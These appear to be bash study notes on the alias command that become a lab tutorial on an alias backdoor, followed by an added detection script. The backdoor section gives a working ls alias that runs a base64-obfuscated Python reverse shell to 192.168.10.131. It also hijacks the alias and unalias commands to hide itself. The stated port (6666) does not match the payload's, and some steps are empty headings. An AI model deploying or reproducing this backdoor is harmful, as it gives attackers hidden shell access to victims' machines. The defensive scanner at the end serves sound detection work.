alias
Usage
List the system's default aliases:
alias
Set an alias:
alias ls='ls -laih'
Remove an alias:
unalias ls
Add parameters:
alias ls='ls -laih;pwd'
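❗Note
Configuration files loaded by default at system startup:
/etc/profile is executed whenever you switch users
bash shell
This file is read every time a new shell is opened
This file is executed every time you log out of the system (exit the bash shell)
Backdoor
Commands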
alias ls='alerts(){ ls $* --color=auto;python3 -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'\''UTF-8'\'')}[sys.version_info[0]]('\''aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4xMC4xMzEiLCA2Nzg5KSkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDApCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAxKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMikKICAgICAgICBwID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsICItaSJdKQogICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAgICAgIGV4aXQoKQ=='\'')))";};alerts'
alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'
alias alias='alerts(){ alias "$@" | grep -v unalias | sed "s/alerts.*lambda.*/ls --color=auto'\''/";};alerts'
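Base64-decoded content:
Adjust the details to match your environment:
If python3 turns out to be missing during the experiment, the following solution can be used:
Install from the default CentOS 7 software repositories
1. Update the system package manager:
2. Install Python 3:
3. Verify that the installation succeeded:
Run ls; the shell connects back to port 6666, on which Kali is listening
The connection information is visible on the [target machine]; the ssh session on the [attack machine] has to be closed before the target machine will execute the commands issued on the attack machine
The alias command has been hijacked, so listing the aliases shows ls='ls --color=auto'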
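Because the hijacked alias and unalias commands filter their own output, a check has to read the startup files directly instead of asking the running shell. The script below is an added detection example, not part of the original notes; the function names, the list of startup files and the three heuristics are assumptions chosen for illustration, and the sample file is constructed with the payload replaced by a placeholder.

```shell
#!/bin/sh
# Added example (not from the original page): static scan for hijacking aliases.
# Files are read with grep, so the result does not depend on the session's
# own `alias`/`unalias` commands, which the backdoor above replaces.

# An alias line is flagged when it
#   1. redefines the alias/unalias builtins themselves, or
#   2. has a body that defines a shell function:  name(){ ... }, or
#   3. has a body that runs an inline interpreter or decodes base64.
SUSPICIOUS_ALIAS_RE='^[[:space:]]*alias[[:space:]]+((alias|unalias)=|[^=]+=.*[A-Za-z_][A-Za-z0-9_]*\(\)[[:space:]]*\{|[^=]+=.*(python[0-9.]*[[:space:]]+-c|perl[[:space:]]+-e|base64|b64decode))'

# scan_alias_file FILE: print "FILE:LINE:text" for every flagged line.
# Returns 0 if something was flagged, 1 otherwise.
scan_alias_file() {
    [ -r "$1" ] || return 1
    # /dev/null as a second operand makes grep always print the file name.
    grep -nE "$SUSPICIOUS_ALIAS_RE" "$1" /dev/null
}

# count_suspicious FILE: print the number of flagged lines in FILE.
count_suspicious() {
    [ -r "$1" ] || { echo 0; return 0; }
    grep -cE "$SUSPICIOUS_ALIAS_RE" "$1" || true
}

# scan_startup_files: scan the usual bash startup files (assumed locations).
scan_startup_files() {
    for f in /etc/profile /etc/bashrc /etc/bash.bashrc /etc/profile.d/*.sh \
             "$HOME/.bashrc" "$HOME/.bash_profile" "$HOME/.bash_login" \
             "$HOME/.profile" "$HOME/.bash_aliases"; do
        scan_alias_file "$f"
    done
    return 0
}

# write_sample FILE: constructed sample rc file, payload replaced by a placeholder.
write_sample() {
    cat > "$1" <<'EOF'
alias ll='ls -l --color=auto'
alias grep='grep --color=auto'
# alias ls='ls -laih'
alias ls='alerts(){ ls $* --color=auto;python3 -c "PLACEHOLDER";};alerts'
alias unalias='alerts(){ echo "-bash: unalias: ${*}: not found";};alerts'
alias alias='alerts(){ alias "$@" | grep -v unalias;};alerts'
EOF
}

# Demo on the constructed sample; call scan_startup_files on a real host.
sample=$(mktemp) && write_sample "$sample" && scan_alias_file "$sample"; rm -f "$sample"
```

In a live session, \alias and builtin alias bypass alias expansion and list the real definitions, and type -a ls shows whether ls resolves to an alias before the binary.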